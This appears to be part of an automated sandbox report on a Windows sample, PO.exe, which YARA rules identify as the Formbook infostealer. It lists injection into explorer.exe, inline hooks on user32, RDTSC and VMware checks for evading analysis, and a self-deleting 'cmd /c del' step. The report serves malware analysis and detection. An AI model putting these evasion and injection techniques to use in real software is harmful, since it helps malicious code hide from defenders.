Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A796D0 NtCreateKey,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79650 NtQueryValueKey,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79FE0 NtCreateMutant,
          Source: C:\Windows\explorer.exeCode function: 3_2_06D52A52 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AA060 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AA110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F82 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9FDA NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F2B NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E1EC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E1F8
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041EADA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E3D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D680
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B020A8
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B090
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B028EC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0E824
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1002
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3F900
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B022AE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6EBB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF03DA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFDBD2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02B28
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4841F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFD466
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4D5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B025DD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A30D20
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02D07
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B01D55
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02EF7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A56E30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFD616
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B01FF1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0DFCE
          Source: C:\Windows\explorer.exeCode function: 3_2_06D52A52
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4ACF2
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4ACE9
          Source: C:\Windows\explorer.exeCode function: 3_2_06D51882
          Source: C:\Windows\explorer.exeCode function: 3_2_06D49072
          Source: C:\Windows\explorer.exeCode function: 3_2_06D49069
          Source: C:\Windows\explorer.exeCode function: 3_2_06D55A0C
          Source: C:\Windows\explorer.exeCode function: 3_2_06D50152
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4DB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4DB22
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D720A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAF900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D722AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC6E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDEBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AE1EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AE1F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AEADA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00892D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00899E3D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00899E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00892FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04CAB150 appears 35 times
          Source: C:\Users\user\Desktop\PO.exeCode function: String function: 00A3B150 appears 45 times
          Source: PO.exe, 00000000.00000003.234946045.000000001EF76000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000003.242100037.000000000098F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.294578840.0000000002BFE000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs PO.exe
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@3/2
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsoBF0C.tmpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: explorer.pdbUGP source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, explorer.exe
          Source: Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
          Source: Binary string: explorer.pdb source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PO.exe Unpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041B828 push cs; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041D0D2 push eax; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041D0DB push eax; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041D085 push eax; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041D13C push eax; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00418292 pushad ; retf
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00417C74 push ds; iretd
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0041E638 pushad ; ret
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00416740 push FFFFFF87h; retf
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A8D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_04CFD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AD085 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AD0DB push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AD0D2 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AB828 push cs; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AD13C push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008A8292 pushad ; retf
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008A7C74 push ds; iretd
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008AE638 pushad ; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_008A6740 push FFFFFF87h; retf
Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEB
Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000008998E4 second address: 00000000008998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000000899B5E second address: 0000000000899B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00409A90 rdtsc
Source: C:\Windows\explorer.exe TID: 1260 Thread sleep time: -58000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6136 Thread sleep time: -44000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
